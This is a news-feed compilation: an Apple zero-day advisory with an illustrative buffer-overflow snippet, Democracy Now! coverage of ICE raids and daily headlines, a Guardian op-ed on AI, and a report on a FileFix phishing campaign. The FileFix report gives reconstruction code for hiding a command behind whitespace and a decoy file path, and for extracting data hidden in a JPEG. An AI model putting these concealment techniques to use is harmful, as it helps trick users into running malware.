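    // BUG: copies claimedCount bytes without checking against capacity.
    for i in 0..<claimedCount {
        buffer[i] = payload[i % payload.count]  // i >= 16 corrupts adjacent memory
    }

    // FIX (the "improved bounds checks" in Apple's advisory amount to this):
    // for i in 0..<min(claimedCount, capacity) { ... }
}
```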
Apple has now addressed this zero-day flaw in iOS 15.8.5 / 16.7.12, as well as iPadOS 15.8.5 / 16.7.12, with improved bounds checks.
"Processing a malicious image file may result in memory corruption. An out-of-bounds write issue was addressed with improved bounds checking," the company said in
Monday
advisories
.
"Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals."
The list of devices impacted by this vulnerability is quite extensive, with the bug affecting a wide range of older models, including:
iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPhone 8, iPhone 8 Plus, and iPhone X,
iPad Air 2, iPad mini (4th generation), iPad 5th generation, iPad Pro 9.7-inch, iPad Pro 12.9-inch 1st generation, and iPod touch (7th generation)
In late August, WhatsApp patched a zero-click vulnerability (CVE-2025-55177) in its iOS and macOS messaging clients, which was chained with Apple's CVE-2025-43300 zero-day in targeted attacks that the company described as "extremely sophisticated."
While Apple and WhatsApp have yet to release any details regarding the attacks chaining the two vulnerabilities, Donncha Ó Cearbhaill, the head of Amnesty International's Security Lab, said that WhatsApp warned some of its users that their devices were targeted in an advanced spyware campaign.
ICE Kills Immigrant Father After Traffic Stop, Detains Day Laborer Who Sued Chicago Police
Democracy Now!
www.democracynow.org
2025-09-16 13:16:05
ICE’s “Operation Midway Blitz” in Chicago is entering its second week of ramped-up immigration enforcement. Community members are mourning the loss of Silverio Villegas Gonzales, a 38-year-old single father and Mexican immigrant who was shot and killed by ICE agents while trying to...
This is a rush transcript. Copy may not be in its final form.
AMY GOODMAN: Just days into Trump’s deployment of hundreds of federal immigration officers to Chicago, ICE agents fatally shot Silverio Villegas Gonzales after the 38-year-old father panicked and began to drive away in his car trying to evade arrest. Minutes earlier on Friday, Villegas Gonzales had dropped off his children at school. ICE claimed he dragged an ICE agent with his car; the officer then fired his weapon. Villegas Gonzales was unarmed and had no criminal record. He was born in Michoacán, Mexico, and worked as a cook.
The killing came as the Trump administration intensifies its immigration crackdown in Chicago under so-called Operation Midway Blitz, which DHS Assistant Secretary Tricia McLaughlin claimed would target, quote, “the worst of the worst.” The Cato Institute revealed earlier this year that 65% of immigrants arrested in Trump’s raids had no criminal convictions, and over 93% were never convicted of violent offenses.
Protesters gathered in the Chicago suburb of Franklin Park over the weekend demanding justice for Villegas Gonzales.
STEVE: This is not fair for our hard-working people, who come out here to this country to earn a living. And I just want to say God bless all. Hopefully it gets — best wishes for everybody. Hopefully everything gets better, situations. But we do need to tell ICE: Stop scaring our people.
AMY GOODMAN: Silverio Villegas Gonzales’s family has organized a fundraiser to help cover the costs of his funeral and burial. In a statement, they wrote he was, quote, “someone who always extended a helping hand, shared his smile freely, and showed up for those he loved — no matter the circumstances.”
As ICE agents swarmed the streets of Chicago, advocates also reported the abduction of Willian Giménez González on Friday. He’s a day laborer who’s suing off-duty Chicago police, working as security for Home Depot, for abusing immigrant day laborers. His legal team says he was taken into custody by ICE in retaliation for his lawsuit. This is Miguel Alvelo Rivera, executive director of Latino Union of Chicago, speaking Saturday at a press conference.
MIGUEL ALVELO RIVERA: In the initial stages of preparing the lawsuit, we made sure Willian and the other workers understood the potential risks of going public about what they had experienced. Once people know who you are and that you’re standing for justice, they might bother you more than before. Willian took a deep breath, and, in our group’s meeting, he said, “I know, but I’m not only doing this to just get justice for myself and my compas. I’m doing this because I don’t want anybody else to ever have to live through what I have lived.”
AMY GOODMAN: This all comes as President Trump is moving to deploy National Guard troops to Memphis, with threats that Chicago will be next.
For more, we’re joined by two guests. In Washington, D.C., Representative Delia Ramirez, Democratic congressmember from Illinois, is with us. She’s the first Latina congressmember to represent Illinois. And in Chicago, we’re joined by Kevin Herrera, legal director of Raise the Floor Alliance, an attorney for Willian Giménez González.
Congressmember, let’s begin with you and the killing of Silverio Villegas Gonzales. He was stopped in a traffic stop after bringing his kids to school. Explain what you understand happened next.
REP. DELIA RAMIREZ: First of all, what happened to Silverio is absolutely devastating. What we understand is that the ICE report that they released and the footage we have seen does not match. ICE is saying that the agent had been dragged for a long distance. The footage shows that it was less than 100 feet. The footage also shows that there was an unmarked SUV that barricaded Silverio. I mean, the point is, ICE stopped a man right after he dropped off his child at school, because he’s Brown, because maybe he looked like he worked a minimum-wage job, and then shot him to death.
JUAN GONZÁLEZ: And, Congresswoman, the boss of Silverio in the hero shop where he worked claimed that he worked 11 hours a day, that he was a model worker. And your response to this continued criminalization of what is, essentially, many hard-working immigrants here in the country?
REP. DELIA RAMIREZ: I mean, Juan, not only that, what people haven’t talked about, that not only was he a father to a 7- and a 3-year-old, he had full custody of these children. These children were left orphans because of ICE and the action they took that morning. It is bone-chilling. People are asking in Chicago, and certainly all over the country, “If I get stopped because I’m Brown, if I get stopped dropping off my child, will my child see me get shot by ICE?” because there’s no justice, no accountability in this precise moment in what they’re doing. And that is a test, and, I think, truly devastating, of our justice system, that there are agents who can do whatever they want, and they don’t have to abide by any enforcement and accountability.
JUAN GONZÁLEZ: And what’s been the response of the Chicago community, from the grassroots organizations to City Hall to the governor, in terms of these attacks and the threats of President Trump to bring in the National Guard in Chicago, as well?
REP. DELIA RAMIREZ: Well, first, Juan, we need a thorough investigation of what happened. The footage, the witnesses we have talked to do not match what the ICE reports show. I think in order for people to feel like justice has been served, we need to know what exactly happened, the protocols, what training, or lack of, these agents had, how many agents were there. I think it’s really important, because people are asking themselves, “If Silverio could get shot, what will happen to me?”

And so, I will say to you that people on the ground around the city, and certainly we’ve seen around the country, they are saying, “We want to see justice for Silverio. We want to know the truth.” And organizations around the city are doubling down, providing protection, rapid response, showing up. Senator Karina Villa in West Chicago, another part of my district, where a number of agents showed up and started surrounding factories and schools, literally showed up and said to ICE, “You do not get to be here. Show me warrants if you want to arrest someone.” So, that level of organizing, with the local electeds, the grassroots organizations, that is what people are counting on to feel like there’s some sense of community coming together to protect them.

But that’s why I’m talking about filing legislation that begins to defund ICE, but also starts putting parameters of accountability here in Congress, because we cannot allow what’s happening to Silverio or children who are being left in a car as they take their mother and father on a main street, as we saw in Chicago, as well, this weekend.
JUAN GONZÁLEZ: I’d like to bring in Kevin Herrera also, the lawyer for Willian Giménez González. Kevin, if you could talk about the circumstances of your client being abducted by ICE agents on Friday?
KEVIN HERRERA: Sure. Mr. Willian Giménez González is a brave, kind, hard-working man here in Chicago. And on Friday, he was on his way to the barber shop with his wife Mari, having worked a full week, to get in, you know, a little self-care and relaxation. They were stopped by ICE agents on their way into the barber shop. Those ICE agents told him his full name, asked him to confirm that he was indeed Willian Alberto Giménez González, and he confirmed that fact. When he chose to do so, they abducted him, took him into custody, and then he disappeared from contact with myself, with his wife for two days.

Mr. Giménez González, we believed, was in Broadview facility. I went there that same day, on Friday, to try and find him in the suburbs of Chicago. I received no acknowledgment at that correctional facility or the transfer processing center, I guess it is. And when I tried to speak to guards and tell them I was an attorney with a client inside, they wouldn’t acknowledge my presence. In fact, they waved their hands in my face. A day later, we gathered with Representative Ramirez, who’s on the call, as well as Representative Chuy García and Latino Union and supporters from his community, to call for information about him, to call for his release in front of that Broadview facility. Moments later, we received a phone call letting us know that he was in Broadview, but we got nothing more for the rest of the day. I filed a petition for habeas corpus at about 12:30 at night that night. But the following morning, I was told that he was moved out of state. So, that’s where we sit with Mr. Giménez González.
AMY GOODMAN: Kevin Herrera, can you explain his — is it a class-action lawsuit against police who were being security for Home Depot, and what that lawsuit is about?
KEVIN HERRERA: Sure. We believe Mr. Giménez González has received special attention from ICE, from the federal government, because of his role not in a class action, but as a plaintiff among four other day laborers, as well as an organizational plaintiff, Latino Union, which we filed in August '24, or 2024, against Home Depot, the city of Chicago and off-duty police officers. Mr. Giménez González was one of among several individuals who was pulled into Home Depot, while they were off of Home Depot property, by private security guards. And we've mentioned before that Mr. Giménez González acts as a day laborer, so he was seeking work from customers in the public outside of Home Depot. But once he was pulled inside, he was taken to a back room, beaten, and then made to sign a paper saying that he had committed trespass.

So, the functions of this operation by off-duty police working as Home Depot security was to essentially force people who were undocumented into the criminal legal system by forcing them to sign papers. Throughout the process, the allegations have been that this was an abuse via the assault, this was an unlawful deprivation of rights under civil rights laws which don’t allow for false arrest, and also civil rights laws that don’t allow for false allegations of crimes. What’s ironic is that the ICE press releases around Mr. Giménez González’s arrest have pointed to his criminal record of trespassing, which stems from these abuses at the Home Depot, as a reason and justification for his apprehension and disappearance.
AMY GOODMAN: Congressmember Delia Ramirez, you’re calling for the defunding of ICE?
REP. DELIA RAMIREZ: I am. I think it’s really important for us to understand $150 billion were just inserted into this organization, into this terror organization, that would be as big as the fifth-largest army in the world. They have no guardrails. There are no controls. They can do what they want. People, the family of Silverio, are asking: Who is investigating what happened to him? What will justice look like? And there’s no guardrails. I have said it before. It is time for us to start defunding them and also start establishing accountability, that is so desperately needed right now.
FBI couldn't get my husband to decrypt his Tor node so he was jailed for 3 years
AI will make the rich unfathomably richer. Is this really what we want? | Dustin Guastella
Guardian
www.theguardian.com
2025-09-16 13:00:06
The ‘knowledge economy’ promised cultural and social growth. Instead, we got worsening inequality and division. Artificial intelligence will supercharge it Recently, Palantir – a tech corporation that boasts no fewer than five billionaire executives – announced its Q2 earnings: over a billion dollar...
Recently, Palantir – a tech corporation that boasts no fewer than five billionaire executives – announced its Q2 earnings: over a billion dollars generated in a single quarter. Forty-eight per cent growth in its business compared with the same quarter last year, including 93% growth in its US commercial business. These elephantine numbers are maddening – and, in large part, a result of the company fully embracing AI.
The AI revolution is here and, as its proponents remind us daily, it will remake our world, making every company and government agency more efficient and less error-prone while helping us unlock hitherto unheard of advances in science and technology. Not only this, but if we play our cards right, big tech’s latest explosion could yield unprecedented economic growth.
Though, we might ask, growth for whom?
Consider OpenAI, the technology giant behind ChatGPT. In a promo video announcing the latest upgrade for their flagship software, its CEO, Sam Altman, bragged: “It can write an entire computer program from scratch.” Three days later, the New York Times reported that computer science grads “are facing some of the highest unemployment rates” among their peers. And it’s not just coders and engineers. AI-powered automation promises to swallow up jobs at the low end of the labor market too, with McDonald’s, Walmart and Amazon all clamoring to integrate AI tools to automate everything from service interactions to warehouse picking and sorting.
As ex-ante reward for all these cost-cutting layoffs, the fortunes of AI entrepreneurs have ballooned beyond all comprehension. So far, if the AI revolution has succeeded in anything, it is in making very rich people even more rich. Rallies on Wall Street have seen AI stocks surge at a record pace for hundreds of so-called “unicorns” – the nearly 500 AI startups that are valued at more than $1bn each. According to Bloomberg, 29 founders of AI companies are now newly minted billionaires. And remember, nearly all of these firms were founded in the last five years.
Why are investors so bullish on the AI boom? Partly because this technology promises to lay off more workers, more rapidly, than any innovation in recent memory. The ludicrous valuations of AI startups are predicated on the idea that this technology has the power to eliminate the very need for human labor. And the business of layoffs is very lucrative. In that sense, the AI boom could represent the most efficient upward redistribution of wealth in modern history.
To be sure, some AI wizards insist the fallout from all of this won’t be so bad for the little guy. Microsoft even predicts that blue-collar workers might have an edge in the AI economy of the future. But none of this is very convincing. Some workers with durable skills will be able to hold on to good wages and stable work for a time. But with breakthroughs in self-driving cars, increasingly roboticized warehouses, lights-out factories and fully automated restaurants, non-college educated workers are going to feel the AI impact much sooner than rosy predictions suggest.
All of this raises a question about the current direction of our economy and whether a strategy that prioritizes hi-tech development over all else makes any sense any more – or if it ever did. In the late 1990s, the dawning of the knowledge economy was heralded as the solution to many economic woes. As the economy of brains replaced the economy of brawn, Americans were promised new heights of greatness. Sure, factories would close and with them millions of high-wage, union jobs would disappear, but the new jobs at Google would be so much better. As a generation of workers was laid off, their children were encouraged to “upskill”, go to college, and learn to code for the jobs of the future. How ironic, then, that AI, the zenith of knowledge work, is resulting in the abolition of knowledge jobs. Karl Marx once wrote that the bourgeoisie created its own gravedigger in the immiserated proletariat. Today’s tech elite seems intent on realizing that prophecy.
It’s not only that the information age supercharged a new class of oligarchs, from Bill Gates and Jeff Bezos to Elon Musk, who now command unfathomable sums of wealth. It’s also that further down the income ladder, wide class cleavages have opened up along educational lines. As computer-based work became prized, wage inequality between college-educated and non-college-educated workers created a widening social gulf.
Today, one’s position on a variety of cultural divisions – from gender ideology to immigration – can be dependably determined by one’s position in the labor market. Those who still make their money by some combination of craft and muscle are increasingly estranged from those who make theirs through the manipulation and administration of “data”. In urban knowledge hubs, an almost medieval class system prevails, with an untouchable clique of bankers and big tech clerics at the top. A large, relatively well-off layer of lawyers, medical professionals and white-collar knowledge workers are beneath them, followed by a proud, but squeezed group of blue-collar and service workers, and finally, a crisis-ridden group made up of the semi- and permanently unemployed.
Not surprisingly, this inequality has resulted in political dysfunction. Enmity, suspicion, resentment and extreme polarization characterize our civic scene, ultimately making for a politics with no winners except the financial and technological elite, who have effectively monopolized their influence on government. Under Joe Biden, they were showered with incentives and subsidies in the form of the Chips and Science Act. Under Donald Trump, they win tax cuts and deregulation. No matter who is in power, they always seem to get richer.
Socially, the great gains of the knowledge economy have also failed to live up to their promises. With instantaneous global connectivity, we were promised cultural excellence and social effervescence. Instead, we’ve been delivered an endless scroll of slop. Smartphone addictions have made us more vicious, bitter and boring. Social media has made us narcissistic. Our attention spans have been zapped by the constant, pathological need to check our notifications. In the built environment, the omnipresence of touchscreen kiosks has removed even the slightest possibility of social interaction. Instead of having conversations with strangers, we now only interact with screens. All of this has made us more lonely and less happy. As a cure, we’re now offered AI companions, which have the unfortunate side effect of occasionally inducing psychotic breaks. Do we really need any more of this?
Most of what we actually need to achieve some measure of the common good requires common labor. To rebuild our crumbling infrastructure and even to upgrade our electrical grid, we need electricians, steelworkers and bricklayers – not gargantuan data centers. To clean city streets, we need more, and better-paid, sanitation workers – not “smart” trash compactors. To handle problems of crime and social order we need more police officers on patrol – not a fleet of robot crime dogs. To improve transportation, we don’t need self-driving cars, we need buses and trains with people who drive them. In other words, there is plenty of meaningful work to be done, if only we, as a society, invested in the low-tech economy. Not to mention that all the essential stuff of life – love, family, friendship, community – are still best left in analog.
Beyond desirability, investing in a low-tech future might become a necessity. Despite all the hype about the potential for AI, the whole thing could be a mirage. The sheer scale of investor money pouring into the AI craze has all the signs of a speculative bubble. If it bursts, it could sink the already fragile Trumpified economy.
To be sure, this is not a Luddite appeal. Advances in technology should continue apace. But should tech development be the main, and overwhelming, priority of the government? In 2022 Congress approved some $280bn in hi-tech investments. In 2024 private investment in AI alone reached $230bn. This year, buoyed by Trump’s deregulation and Wall Street overconfidence, tech’s biggest companies are set to invest another $320bn in AI and data centers. By comparison, the price tag for Biden’s supposedly mammoth investments in roads and bridges totaled a paltry $110bn. It’s not that we need to throttle technology, but the balance is out of whack.
Marx – who was as great a promethean progressive as one could find – thought technology ought to serve social and human needs. Today, we have the formula exactly backwards – society serves tech. Of course, Silicon Valley leaders like to tell us that the increasingly complex challenges of the future will only be solved by yet more investments in R&D, yet more deregulation and clearance for ever-larger voltage-greedy data centers. But it’s not the complex problems of the future that are the most intractable. It’s the age-old conundrums of money, class and power.
Dustin Guastella is director of operations for Teamsters Local 623 in Philadelphia, and a research associate at the Center for Working-Class Politics
New FileFix attack uses steganography to drop StealC malware
Bleeping Computer
www.bleepingcomputer.com
2025-09-16 13:00:00
A newly discovered FileFix social engineering attack impersonates Meta account suspension warnings to trick users into unknowingly installing the StealC infostealer malware. [...]...
A newly discovered FileFix social engineering attack impersonates Meta account suspension warnings to trick users into unknowingly installing the StealC infostealer malware.
FileFix is a new variant of the ClickFix family of attacks, which uses social engineering to trick users into pasting malicious commands into operating system dialog boxes as supposed "fixes" for problems.
The FileFix technique was created by red team researcher mr.d0x; instead of convincing users to paste malicious PowerShell commands into the Windows Run dialog or a terminal, FileFix abuses the address bar in File Explorer to execute the commands.
This is not the first time FileFix has been used in attacks, with the Interlock ransomware gang previously using FileFix to install its remote access trojan (RAT). However, these earlier attacks utilized the original FileFix proof-of-concept (PoC), rather than evolving it with new lures.
New FileFix campaign
The new campaign, discovered by Acronis, uses a multi-language phishing page that poses as Meta's support team, warning recipients that their account will be disabled in seven days unless they view an "incident report" allegedly shared by Meta.
However, this report is not actually a document, but a disguised PowerShell command used to install malware on targets' devices.
The phishing page tells users to click the "Copy" button to copy what appears to be a file path, click on the open File Explorer button, and then paste the path into the File Explorer address bar to open the document.
However, clicking the Copy button actually copies a PowerShell command with added spaces into the Windows clipboard, so that only the file path is shown when pasted into File Explorer.
"In order to trick the user into thinking that they are pasting the path to an 'incident report' PDF file, the attacker has placed a variable at the end of the payload, which contains a lot of spaces and the fake path at the end," explains Acronis.
"This is done so that only the file path would appear in the address bar, and none of the actual malicious commands. In an average ClickFix attack, this is done using the # symbol instead of a variable, which is taken by PowerShell as a developer comment."
"This has the unintentional advantage that anyone who has built their detections to look for the "#" symbol from ClickFix, is likely to miss this."
FileFix attack impersonating Meta support
Source: Acronis
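To make that layout concrete, here's a harmless reconstruction of how such a clipboard payload can be put together. The command and path below are made up, and the real campaign's payload and quoting details differ; the structure (command, padding, decoy path in a variable) is the part that matters:

```swift
// A harmless reconstruction of the clipboard trick Acronis describes:
// a command, then a PowerShell variable assignment whose string value is
// a run of spaces followed by a fake file path. No '#' comment is needed,
// which sidesteps detections built around the classic ClickFix pattern.
let command = #"powershell -c "ping example.com""#  // benign stand-in for the malicious stage
let spaces = String(repeating: " ", count: 120)     // pushes the command out of view
let decoy = #"; $d = '"# + spaces + #"C:\company\incident_report_2025.pdf'"#
let clipboardPayload = command + decoy

// File Explorer's address bar shows the tail end of the pasted text,
// so the victim sees only something like the fake PDF path:
print(clipboardPayload.suffix(40))
```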
This FileFix campaign stands out as it uses steganography to hide both a second-stage PowerShell script and encrypted executables inside what appears to be a harmless JPG image hosted on Bitbucket.
The first-stage PowerShell command, unknowingly entered by the target, downloads the image and extracts the embedded second-stage script, which then decrypts the payloads in memory.
Second PowerShell script embedded in image
Source: BleepingComputer
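Acronis's summary doesn't spell out the embedding scheme, but one common low-tech approach is to append the payload after the JPEG end-of-image marker, where image viewers simply stop reading. A sketch of extracting data hidden that way (illustrative only, and not necessarily this campaign's exact technique):

```swift
import Foundation

// Extract data stashed after a JPEG's end-of-image (EOI) marker, FF D9.
// Viewers stop rendering at the marker, so the file still opens as a
// normal-looking picture even with a payload appended to it.
func payloadAfterEOI(jpeg: Data) -> Data? {
    let marker = Data([0xFF, 0xD9])
    guard let eoi = jpeg.range(of: marker, options: .backwards) else { return nil }
    let trailing = jpeg.subdata(in: eoi.upperBound..<jpeg.count)
    return trailing.isEmpty ? nil : trailing
}

// Usage: if let hidden = payloadAfterEOI(jpeg: try Data(contentsOf: imageURL)) { ... }
```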
The final payload is the StealC infostealer malware, which attempts to steal the following data from infected devices:
Credentials and authentication cookies from web browsers (Chrome, Firefox, Opera, Tencent, etc.)
Credentials from messaging apps (Discord, Telegram, Tox, Pidgin)
VPN and gaming apps (ProtonVPN, Battle.net, Ubisoft)
Ability to take a screenshot of the active desktop.
Acronis reports that multiple variants of this campaign were observed over two weeks, using different payloads, domains, and lures.
"Throughout our investigation, we've uncovered several iterations of the attack, going back two weeks," observed Acronis.
"Through these iterations, we can trace out an evolution of both the social engineering technique, and the more technical aspects of the attack."
"Perhaps this is indicative or an attacker testing out an infrastructure they are planning to use in the future, or perhaps these are iterations added to the attack mid campaign, as the attacker learns to adapt and improve."
While most organizations have educated their employees on phishing tactics, ClickFix and FileFix tactics remain relatively new and continue to evolve.
Acronis recommends that companies educate their users on these new tactics and the risks of copying data from a website into seemingly harmless system dialogs.
Headlines for September 16, 2025
Democracy Now!
www.democracynow.org
2025-09-16 13:00:00
U.N. Inquiry Finds Israel Is Committing Genocide in Gaza, Israel Launches Major Ground Offensive to Seize Gaza City, Lebanon Says Israeli Airstrike on Residential Building Injured 12 Civilians, Secretary of State Rubio Meets with Qatar’s Emir in the Wake of Israel’s Deadly Strike in Doha...
U.N. Inquiry Finds Israel Is Committing Genocide in Gaza
Sep 16, 2025
A United Nations inquiry has found Israel has committed genocide during its nearly two-year assault on the Gaza Strip. Earlier today, the U.N. Independent International Commission of Inquiry on the Occupied Palestinian Territory said in a 72-page report that Israel’s government is responsible for four of the five acts prohibited under the 1948 Genocide Convention. The report holds three Israeli leaders responsible: Prime Minister Benjamin Netanyahu, former Defense Minister Yoav Gallant and President Isaac Herzog. Navi Pillay, who heads the commission, drew parallels between Israel’s assault on Gaza and the Rwandan genocide of 1994.
Navi Pillay: “Genocide is occurring in Gaza. … In the Rwandan genocide, the group were the Tutsis, and here the group are the Palestinians.”
The findings could be used by prosecutors at the International Criminal Court or the U.N.’s International Court of Justice.
Israel Launches Major Ground Offensive to Seize Gaza City
Sep 16, 2025
Israel’s military says it has launched a major ground offensive to seize Gaza City and displace its 1 million residents. Israel’s defense minister says, quote, “Gaza is burning.” Gaza health officials report at least 68 people have been killed by Israeli airstrikes since dawn, most of them in Gaza City. This is Fatima, an elderly resident of a tent camp close to the Al-Ghefari building in western Gaza City, which Israel bombed into rubble on Monday.
Fatima: “I cannot stand on my legs out of fear. Enough hunger, thirst and fear. When they did this, I collapsed completely. I cannot walk.”
The Palestinian Civil Defense reports Israel has blown up over 50 Gaza high-rises in recent weeks.
In Geneva, Francesca Albanese, the U.N. special rapporteur on human rights in the occupied Palestinian territory, said Monday Israel’s military is destroying entire neighborhoods and the remnants of buildings where people were seeking shelter.
Francesca Albanese: “It’s trying to forcibly evacuate the 800,000 Palestinians who were seeking refuge there. But the question is 'why?' Why? Because this is the last piece of Gaza that needs to be rendered unlivable before advancing the ethnic cleansing of that piece of land, and then probably they will move to the West Bank.”
Lebanon Says Israeli Airstrike on Residential Building Injured 12 Civilians
Sep 16, 2025
Lebanon’s Health Ministry says an Israeli airstrike on a residential building injured 12 civilians in the Nabatieh region of southern Lebanon on Monday. Four children and seven women were among the wounded. Israel has repeatedly attacked Lebanon despite a ceasefire deal signed in November.
Secretary of State Rubio Meets with Qatar’s Emir in the Wake of Israel’s Deadly Strike in Doha
Sep 16, 2025
Image Credit: State Department photo
Secretary of State Marco Rubio is in Doha today for talks with Qatar’s emir, Sheikh Tamim bin Hamad al-Thani, in the wake of Israel’s deadly strike last week targeting Hamas leaders in Doha. Rubio’s trip comes after leaders of the Gulf Cooperation Council said Monday they had agreed to activate a mutual defense pact in response to Israeli aggression. Meanwhile, Axios reports Israeli Prime Minister Benjamin Netanyahu informed President Trump last Tuesday morning that Israel planned to attack Hamas leaders in Qatar nearly an hour before the strike took place. That report contradicts White House claims that Trump was notified only after missiles were in the air, giving him no opportunity to oppose the strike.
Trump Says U.S. Strikes a Second Venezuelan Boat, Killing 3 People
Sep 16, 2025
Image Credit: Donald Trump/Truth Social
President Trump said Monday the U.S. had carried out a strike against a second boat he alleged was carrying drugs from Venezuela, killing at least three people on board. Trump made the announcement on social media and posted a video of an apparent airstrike, showing a speedboat erupting in flames. This follows a strike earlier this month on another boat also allegedly carrying drugs from Venezuela, which reportedly killed 11 people. Speaking to The New York Times, Rear Admiral Donald J. Guter, a retired top judge advocate, said, “Trump is normalizing what I consider to be an unlawful strike.” Here’s Venezuela’s President Nicolás Maduro speaking shortly before the second strike.
President Nicolás Maduro: “This is not tension; it is outright aggression — judicial aggression, when they criminalize us; political aggression, with their daily threatening statements; diplomatic aggression; and ongoing military aggression. Venezuela is empowered by international law to comprehensively confront this aggression. It is not tension; it is aggression.”
JD Vance Vows to “Dismantle” Institutions on the Political Left in the Wake of Kirk’s Killing
Sep 16, 2025
Image Credit: The Charlie Kirk Show
FBI Director Kash Patel says investigators have found DNA evidence linking 22-year-old suspect Tyler Robinson to the killing of right-wing activist Charlie Kirk in Utah last week. Utah County prosecutors will formally arraign Robinson today; they’re planning to seek the death penalty.
On Monday, Vice President JD Vance vowed to dismantle institutions on the political left that he claimed were promoting violence and terrorism. Vance made the remarks while hosting Kirk’s podcast “The Charlie Kirk Show.”
Vice President JD Vance: “Of course, we have to make sure that the killer is brought to justice. And importantly, we have to talk about this incredibly destructive movement of left-wing extremism that has grown up over the last few years and, I believe, is part of the reason why Charlie was killed by an assassin’s bullet. We’re going to talk about how to dismantle that.”
Joining Vance’s call for retribution were White House adviser Stephen Miller, spokesperson Karoline Leavitt and Health Secretary RFK Jr. Since Kirk’s killing, scores of politicians, public figures and private-sector workers have faced firings, suspensions or investigations over their comments about the assassination — among them, The Washington Post’s last remaining full-time African American opinion columnist, Karen Attiah. In a post on Substack Monday, Attiah wrote, “Last week, the Washington Post fired me. The reason? Speaking out against political violence, racial double standards, and America’s apathy toward guns.”
Utah Law Allowing Open Carry on Campuses Criticized After Kirk’s Assassination
Sep 16, 2025
In Utah, a law allowing people with permits to openly carry guns on college campuses is being questioned in the wake of Charlie Kirk’s assassination. Before the bill’s passage last month, firearms had to be concealed on college campuses in Utah. Meanwhile, Florida’s attorney general says people can now openly carry firearms in public after the state’s appeals court struck down a 40-year ban on the practice.
Trump Signs Order Deploying National Guard Troops to Memphis
Sep 16, 2025
President Trump signed an order Monday authorizing the deployment of National Guard troops to Memphis, Tennessee, in support of a new federal task force to combat violent crime in the city. Trump’s order came just days after the Memphis Police Department reported crime is at a 25-year low, with robbery, larceny and burglary all at record lows over the past eight months. Tennessee Democrats gathered in Memphis Monday to condemn Trump’s crackdown. This is state Representative Justin J. Pearson, who represents Memphis.
Rep. Justin Pearson: “Today, it is a conversation about crime. In 14 months, it will be a conversation about protecting the vote at the vote — at the voting booth. In three-and-a-half years, it’s going to be about a presidential election and the need to protect it. And what happens when we go to the polls, and the National Guard is there, and all they’re doing is asking you, 'Are you sure you want to vote?' This isn’t just a slippery slope; this is a dangerous impediment on our democracy.”
Trump Lashes Out at New York Governor Hochul for Endorsing Mamdani in NYC Mayoral Race
Sep 16, 2025
President Trump said Monday that New York Governor Kathy Hochul’s endorsement of Zohran Mamdani in the New York City mayoral election was “a very bad one for New York City.” Trump suggested that he would consider holding back federal funds from the city if Mamdani is elected.
After headlines, we’ll look at Trump’s escalating immigration crackdown on Chicago with Congressmember Delia Ramirez. Trump has also threatened deploying U.S. troops to Chicago.
NYT: UAE Chips Deal Linked to $2B Investment in Trump Family Cryptocurrency Firm
Sep 16, 2025
A New York Times report has revealed how a member of the ruling family of the United Arab Emirates invested $2 billion in the Trump family’s cryptocurrency company just days before the UAE received access to rare artificial intelligence chips. Back in May, Sheikh Tahnoon bin Zayed Al Nahyan invested $2 billion into World Liberty Financial, a cryptocurrency startup run by the Trump and Witkoff families — Steve Witkoff is President Trump’s special envoy to the Middle East. Two weeks later, the Trump administration approved the sale of hundreds of thousands of AI chips to the Emiratis, despite concerns that the chips could be shared with China.
The Times report did not directly link the two deals, but cast suspicion on the timing. Ryan Cummings, chief of staff at the Stanford Institute for Economic Policy Research, said, “If this is true, this is the largest public corruption scandal in the history of the United States and it’s not even close.”
Senate Confirms White House Adviser Stephen Miran as Fed Governor
Sep 16, 2025
Senate Republicans have confirmed one of President Trump’s top economic advisers, Stephen Miran, to the Federal Reserve Board. In an unusual arrangement, Miran will only take a leave of absence from his role as chair of the Council of Economic Advisers, instead of resigning from his post. Miran says he intends to return to the White House after his term ends. The move allows Miran to attend the Fed’s two-day meeting to set interest rates, which starts today.
Meanwhile, a U.S. appeals court blocked Trump’s attempt to fire Federal Reserve
Governor Lisa Cook before today’s interest rate meeting. In an opinion, Appellate Judge Bradley Garcia wrote, “Before this court, the government does not dispute that it provided Cook no meaningful notice or opportunity to respond to the allegations against her.” President Trump has repeatedly demanded that the Federal Reserve cut interest rates fast, and has threatened to fire Federal Reserve Chair Jerome Powell.
Maurene Comey, Who Prosecuted Jeffrey Epstein, Sues Over Her “Politically Motivated” Firing
Sep 16, 2025
Fired federal prosecutor Maurene Comey, the daughter of former FBI Director James Comey, is suing the Trump administration for her sudden termination in July. As an assistant U.S. attorney in Manhattan, Comey had worked on several high-profile cases, including against convicted sex offender Jeffrey Epstein and his co-conspirator, Ghislaine Maxwell. Comey’s lawsuit claims that she had been fired for “her father’s protected speech, or because of her perceived political affiliation and beliefs, or both.” The lawsuit also notes that the far-right activist Laura Loomer had called for Comey’s firing on social media.
On El Salvador’s Independence Day, Protesters Demand Release of Jailed Human Rights Defenders
Sep 16, 2025
In El Salvador, protesters took to the streets Monday to demand the release of activists and human rights defenders jailed by President Nayib Bukele, a staunch ally of President Trump. The protests came as El Salvador marked its 204th Independence Day celebrations. This is opposition lawmaker Claudia Ortiz.
Claudia Ortiz: “El Salvador is on the path to an authoritarian system, an authoritarian system where the state is more important than the individual. And that should not be the case. The state exists to serve the individual, their dignity and their freedom. The state must provide legal certainty. But in El Salvador, the opposite is true.”
A few years ago, we decided to overhaul the internals of our in-house open-source job queue manager JQM, a sort of specialized application server for asynchronous jobs. One goal in particular was to allow customer-specific extensions of the product at some identified extension points, with as little friction as possible. We thought we were in an ideal case to implement OSGi, a renowned modularity framework:
the code was already carefully architected, especially with the extension points clearly marked,
we already had experience with OSGi, a well-known Java modularity framework.
How wrong we were! This post is not about why we chose OSGi over the alternative, JPMS. It is about everything that factually went wrong, with a healthy dose of (very) tired ranting.
Disease and Medicine: not (always) OSGi's fault
A modularity framework has two main responsibilities: ensure isolation between ‘modules’ (whatever the chosen granularity defining a module is) and manage the lifecycle of said modules.
The first point is the real goal: a module should be independent of the implementations of the contracts it uses. This is especially important for our use case – we need a plugin system, consisting of a set of Java interfaces with an unlimited number of implementations we know nothing about. And the framework should do its utmost to restrict what a module can see inside the others.
The second point is a consequence: as long as we know nothing of implementations and can only use interfaces, we need someone else to instantiate objects and provide instances backing the interfaces. There are a host of different patterns to do this, mostly gravitating around the Inversion of Control and the Registry patterns.
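To make the shape of the problem concrete, here is a minimal sketch of such a plugin contract using plain java.util.ServiceLoader, the JDK's built-in registry (all names here are hypothetical; an OSGi service registry plays the same role, with stronger isolation):

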